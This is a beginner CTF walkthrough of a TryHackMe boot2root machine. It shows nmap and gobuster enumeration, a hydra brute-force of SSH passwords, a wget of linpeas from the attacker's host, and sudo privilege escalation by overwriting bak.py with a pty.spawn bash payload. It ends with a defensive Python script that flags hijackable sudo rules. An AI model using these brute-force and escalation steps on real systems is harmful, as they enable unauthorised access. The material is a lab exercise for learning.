
SVR Aravind
4 min read · Jun 7, 2021

boot2root machine for FIT and bsides guatemala CTF

A beginner-level, easy Capture The Flag (CTF) that challenges newcomers to solve a variety of tasks using available tools, and to break into a server to steal data. In this post, a course task from HackerU : RED Team Pentester, I will show the steps I followed to get the flag.

Basic checks to perform before attacking the machine:

1. Power on the target machine and make a note of its IP address.

2. Start your Kali virtual machine.

3. Connect to the TryHackMe OpenVPN:

# sudo openvpn <vpn-file-name>

Step 1

Nmap (Network Mapper) - Enumeration

Let's start with an nmap scan:

# nmap -A -sCV -Pn --reason <Target IP>

Only the HTTP and SSH services are open.

Step 2

Let us check the HTTP service. Open your favourite browser and type in the IP address of the target machine.

A blog web page is displayed, and you can see a blog post written by an author, M***.

Viewing the page source does not reveal much information.

Step 3

Let us perform a directory search:

gobuster dir -u http://<Target Machine IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html --timeout 60s

gobuster reveals some directories; the interesting one is 'robots.txt'. There is nothing useful in it, but what catches the attention is the word "r*****u".txt.

Step 4

Let us use hydra to brute-force the password for the blog author's username; the protocol will be SSH, since the nmap scan showed that the open ports were SSH and HTTP.

# hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<Target Machine IP>/
# password found

Step 5

Let us SSH into the target machine with the password:

# ssh <username>@<Target Machine IP>

After entering the password, BOOM!!!, we have access. We need to find the user flag.

As a good practice, type the following commands:

whoami : shows the user under which the command is invoked.

id : shows the user and group IDs and names. If you get (1000), it means a normal user; the user does not have root access.

Type "ls -ltr" and you will find the first flag, user.txt:

# ls -ltr && cat user.txt

Step 6

From the earlier command, "ls -ltr", we noticed two files. One was the flag and the other was <something>.py. If you look closely, <something>.py can be run as root only.

The initial shell is a normal user's access; the current user does not have root privileges.

Let us try uploading linpeas.sh to the target machine. On your attacker machine, navigate to the directory where linpeas.sh is located.

In the terminal type "python3 -m http.server 9000".

Go to the target machine's terminal and type:

wget http://<Attacker Kali IP>:<port>/linpeas.sh

Once the file has been uploaded to the target machine, check its permissions with "ls -ltr".

Make linpeas.sh executable using the command:

chmod +x linpeas.sh

Let us run linpeas: # ./linpeas.sh

After linpeas completes, you will have to scroll through the output and find anything interesting that can be used to gain root access.

Anything in RED deserves a look. You can find root-owned files in the home directory of the user whose shell we got. The file name is bak.py.

The understanding is that the user M***** can run bak.py without a password.

In the terminal of the target machine, enter sudo -l:

# sudo -l

The current user should be able to execute bak.py and, with this privilege escalation, capture the root flag.

First remove bak.py from the current user's home directory.

Create a file: # touch bak.py

Use the default Linux editor: # nano bak.py

Add the following line to bak.py:

import pty;pty.spawn("/bin/bash")

{or}

echo 'import pty;pty.spawn("/bin/bash")' > bak.py

Do not forget to set the permissions for bak.py:

# chmod +777 bak.py

To get the root shell, type the entire path, as shown in the sudo -l output:

# sudo /usr/bin/python /home/meliodas/bak.py

Navigate to the root directory; root.txt is the flag.
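As an added example (not part of the original walkthrough), here is a small audit script a defender can run to catch the misconfiguration this box relies on: a sudo rule whose script lives in a directory the invoking user can write to, so the root-owned file can simply be deleted and recreated. The `sudo -l` output and the writability model are constructed samples; `parse_sudo_l` and `find_hijackable` are names I chose, not tools from the post.

```python
import os
import re
import shlex

# One rule line of `sudo -l` output, e.g. "(ALL) NOPASSWD: /usr/bin/python /home/meliodas/bak.py"
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_l(output):
    """Return (run-as spec, NOPASSWD flag, argv) for every rule line in `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = _RULE.match(line)
        if m:
            rules.append((m.group("runas"), "NOPASSWD:" in m.group("tags"),
                          shlex.split(m.group("cmd"))))
    return rules

def default_writable(path):
    """Live filesystem check: can the current user write this path?"""
    return os.access(path, os.W_OK)

def find_hijackable(output, writable=default_writable):
    """Flag absolute paths in sudo rules that the invoking user could replace.

    A path is reported when the file itself is writable, or when its parent
    directory is: then the file can be deleted and recreated, which is exactly
    what happens to a root-owned script kept inside a user's home directory."""
    findings = []
    for runas, nopasswd, argv in parse_sudo_l(output):
        for i, arg in enumerate(argv):
            if not arg.startswith("/"):
                continue  # only absolute paths are checked
            parent = os.path.dirname(arg)
            if writable(arg):
                reason = "file is writable"
            elif writable(parent):
                reason = "parent directory %s is writable" % parent
            else:
                continue
            findings.append({"path": arg, "role": "command" if i == 0 else "argument",
                             "runas": runas, "nopasswd": nopasswd, "reason": reason})
    return findings

# Constructed sample: the rule this box exposes, as `sudo -l` would print it.
SAMPLE_SUDO_L = """\
User meliodas may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/python /home/meliodas/bak.py
"""
```

Calling `find_hijackable(SAMPLE_SUDO_L, lambda p: p in {"/home/meliodas"})` (a constructed model in which the user owns the home directory but not the root-owned script) returns one finding for /home/meliodas/bak.py; on a live host, call it with no second argument so the real filesystem is checked.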

That’s it folks. Happy hacking!!!
